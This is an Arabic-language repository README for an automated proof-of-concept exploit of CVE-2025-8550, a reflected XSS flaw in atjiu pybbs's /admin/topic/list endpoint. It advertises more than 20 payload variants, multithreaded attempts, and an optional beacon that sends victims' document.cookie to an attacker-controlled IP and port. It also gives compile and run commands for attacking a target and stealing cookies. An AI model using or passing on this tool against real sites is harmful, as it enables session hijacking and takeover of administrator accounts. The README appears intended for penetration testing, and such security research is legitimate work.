
# استغلال إثبات المفهوم الآلي لـ CVE-2025-8550 استغلال إثبات مفهوم آلي لثغرة CVE-2025-8550، وهي ثغرة XSS منعكسة في atjiu pybbs. يتضمن أكثر من 20 صيغة حمولة، واستخراج ملفات تعريف الارتباط، وتعدد الخيوط، وواجهة سطر أوامر قابلة للتخصيص لاختبار الاختراق.
يستضيف هذا المستودع استغلالاً آلياً لإثبات المفهوم (PoC) لثغرة CVE-2025-8550، وهي ثغرة من نوع البرمجة النصية عبر المواقع المنعكسة (XSS) في atjiu pybbs (الإصدار ≤ v6.0.0). تستهدف هذه الثغرة معامل username في نقطة النهاية /admin/topic/list، الذي يفتقر إلى تنقية الإدخال المناسبة.
أكثر من 20 اختلافاً للحمولة: سكريبت، SVG، iframe، object، معالجات onerror وغيرها.
تشفير URL تلقائي: يضمن الحقن الآمن عبر curl_easy_escape من libcurl.
استخراج ملفات تعريف الارتباط (اختياري): حقن إشارة لإرسال document.cookie إلى خادم يتحكم به المهاجم.
تعدد الخيوط: يستخدم pthreads لتوازي المحاولات وتسريع الاختبار.
واجهة سطر أوامر قابلة للتخصيص: مدعومة بـ argparse، تدعم تحديد:
-u / --url)-c / --cookies)-k / --cokpay)-i / --ip، -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> بمثيل atjiu pybbs الخاص بك.-k لتفعيل إشارة سرقة ملفات تعريف الارتباط (يتطلب -i و -p).-c إذا لم تكن هناك حاجة لملفات تعريف الارتباط الخاصة بالمصادقة.MIT License